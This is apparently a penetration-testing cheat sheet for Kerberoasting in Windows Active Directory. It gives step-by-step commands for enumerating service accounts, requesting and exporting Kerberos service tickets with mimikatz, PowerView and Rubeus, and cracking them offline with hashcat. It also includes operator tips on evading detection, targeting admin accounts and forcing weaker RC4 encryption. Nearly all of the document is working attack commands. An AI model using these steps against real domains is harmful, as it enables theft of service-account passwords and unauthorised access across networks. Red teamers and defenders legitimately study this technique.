Windows

Semi-manual method

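# Enumerating SPNs with setspn.exe (-Q */* lists every SPN registered in the current
# domain; add -F to search the whole forest).
# Kerberoasting only pays off for SPNs bound to *user* accounts (service accounts with a
# human-chosen password). HOST/… and other computer-account SPNs are backed by long random
# machine passwords and are not worth requesting or cracking.
C:\> setspn.exe -Q */*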

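# Requesting a ticket and loading it into memory
# Targeting a single user: asking for a security token for the SPN makes the KDC return a
# service ticket (TGS) encrypted under the service account's key. The ticket lands in the
# current logon session's cache (visible with klist), from where it is exported below.
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"
# The SPN string must match a registered SPN exactly (service class, host, port) — copy it
# from the setspn / PowerView output rather than guessing. The ticket's encryption type is
# decided by the KDC from the account's supported etypes; an AES ticket will not fit the
# RC4-only (-m 13100) cracking steps, so check the etype with klist before exporting.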

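# Extracting tickets from memory with mimikatz
# base64 /out:true makes export commands print the ticket as base64 on the console, which
# avoids having to pull .kirbi files off the host.
mimikatz # base64 /out:true
# Lists the tickets of the current logon session and exports them; pick the one whose
# server name matches the target SPN. Note the encryption type in the listing: only an
# RC4-HMAC ticket (0x17 / rc4_hmac_nt) produces a $krb5tgs$23$ hash for hashcat -m 13100.
mimikatz # kerberos::list /export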

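# Preparing the base64 blob for cracking: mimikatz wraps the output and a Windows console
# adds CR, so strip CR, LF and stray spaces — GNU base64 -d rejects input containing '\r'.
printf '%s' "<base64 blob>" | tr -d '\r\n ' > encoded_file

# Decoding the cleaned blob back into a .kirbi file
base64 -d encoded_file > sqldev.kirbi

# Using kirbi2john.py to pull the encrypted part of the TGS out of the .kirbi.
# Tool link: https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py
# Python 2 script; it writes the john-formatted hash to ./crack_file, which the next step reads.
python2.7 kirbi2john.py sqldev.kirbi

# Modifying crack_file for hashcat: kirbi2john emits "$krb5tgs$<name>:<hash>" while
# hashcat -m 13100 expects "$krb5tgs$23$*<name>*$<hash>".
# The hard-coded 23 assumes an RC4-HMAC ticket. If the exported ticket was AES
# (etype 17/18) this line produces an unusable hash — those need the 19600/19700 formats.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

# Cracking the hash with hashcat (13100 = Kerberos 5 TGS-REP, etype 23 / RC4-HMAC)
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt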

Automated

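# Using PowerView to list every user account that has an SPN (the Kerberoastable set)
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -SPN | select samaccountname

# Using PowerView to request and format the TGS for one specific user
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Requesting tickets for every SPN user and exporting them to a CSV file
# OPSEC: this sends one TGS-REQ per SPN user, and each request is logged on the DC as
# event 4769 (a burst of 4769s with RC4 etype 0x17 is a standard Kerberoasting detection).
# Target specific accounts when noise matters.
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\output_tgs.csv -NoTypeInformation

# The Hash field of each row is then cracked with hashcat -m 13100 as in the semi-manual method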

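# Using the /stats flag: only enumerates Kerberoastable accounts (supported encryption
# types, pwdLastSet) and requests no tickets, so nothing beyond the LDAP query is logged.
PS C:\> .\Rubeus.exe kerberoast /stats

# Using the /nowrap flag: prints each hash on a single line so it copies cleanly.
# /ldapfilter narrows the LDAP search — here to accounts with admincount=1, the
# highest-value targets.
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# RC4-HMAC hashes crack far faster than AES ones (AES keys are derived with PBKDF2 over
# 4096 iterations, RC4 keys are a single NT hash).
# /tgtdeleg obtains a usable TGT through the tgtdeleg trick and builds the TGS-REQ with
# only RC4 in the supported etypes, so a DC that honours the request returns an RC4 ticket
# even for an AES-enabled account. Newer or hardened DCs may still hand back AES: check the
# hash prefix ($krb5tgs$23$ vs $17$/$18$) and match the hashcat mode (13100 / 19600 / 19700).
PS C:\> .\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap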
